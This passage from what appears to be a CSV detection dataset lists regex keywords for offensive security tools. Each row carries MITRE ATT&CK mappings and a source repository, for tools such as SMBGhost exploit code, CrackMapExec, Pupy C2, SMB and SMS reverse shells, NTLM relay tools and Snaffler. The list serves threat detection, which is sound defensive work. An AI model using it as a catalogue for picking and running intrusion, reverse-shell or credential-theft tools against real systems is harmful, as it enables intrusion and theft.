Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SMBForwarder.txt*",".{0,1000}\/SMBForwarder\.txt.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/SMBGhost/scanner.py*",".{0,1000}\/SMBGhost\/scanner\.py.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","654","199","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" "*/SMBGhost_RCE*",".{0,1000}\/SMBGhost_RCE.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1290","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" "*/SMBGrab.pl*",".{0,1000}\/SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - 
TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/SMBHunt.pl*",".{0,1000}\/SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/smbldap.py*",".{0,1000}\/smbldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/SMBList.pl*",".{0,1000}\/SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" 
"*/smb-ls.nse*",".{0,1000}\/smb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smbmap.git*",".{0,1000}\/smbmap\.git.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*/smbmap.py*",".{0,1000}\/smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/smbmapDump*",".{0,1000}\/smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 
"*/smb-mbenum.nse*",".{0,1000}\/smb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-os-discovery.nse*",".{0,1000}\/smb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-print-text.nse*",".{0,1000}\/smb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-protocols.nse*",".{0,1000}\/smb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-psexec.nse*",".{0,1000}\/smb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smbrelayserver.py*",".{0,1000}\/smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*/smb-reverse-shell*",".{0,1000}\/smb\-reverse\-shell.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*/smb-security-mode.nse*",".{0,1000}\/smb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smbserver/smb_server.py*",".{0,1000}\/smbserver\/smb_server\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*/smb-server-stats.nse*",".{0,1000}\/smb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-signing-disabled-hosts.txt*",".{0,1000}\/smb\-signing\-disabled\-hosts\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/smbspider.py*",".{0,1000}\/smbspider\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" 
"*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.py*",".{0,1000}\/smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr_results.csv*",".{0,1000}\/smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smb-system-info.nse*",".{0,1000}\/smb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln.py*",".{0,1000}\/smb\-vuln\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/smb-vuln-conficker.nse*",".{0,1000}\/smb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-cve2009-3103.nse*",".{0,1000}\/smb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-cve-2017-7494.nse*",".{0,1000}\/smb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-cve-2020-0796.nse*",".{0,1000}\/smb\-vuln\-cve\-2020\-0796\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/smb-vuln-ms06-025.nse*",".{0,1000}\/smb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms07-029.nse*",".{0,1000}\/smb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms08-067.nse*",".{0,1000}\/smb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms10-054.nse*",".{0,1000}\/smb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms10-061.nse*",".{0,1000}\/smb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-ms17-010.nse*",".{0,1000}\/smb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-regsvc-dos.nse*",".{0,1000}\/smb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-vuln-webexec.nse*",".{0,1000}\/smb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-webexec-exploit.nse*",".{0,1000}\/smb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SMShell.git*",".{0,1000}\/SMShell\.git.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*/SMShell/*",".{0,1000}\/SMShell\/.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*/smtp-brute.nse*",".{0,1000}\/smtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-commands.nse*",".{0,1000}\/smtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-enum-users.nse*",".{0,1000}\/smtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-ntlm-info.nse*",".{0,1000}\/smtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-open-relay.nse*",".{0,1000}\/smtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-strangeport.nse*",".{0,1000}\/smtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-user-enum*",".{0,1000}\/smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2010-4344.nse*",".{0,1000}\/smtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2011-1720.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2011-1764.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\/smtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/smuggler.py*",".{0,1000}\/smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*/SnaffCon.cs*",".{0,1000}\/SnaffCon\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - 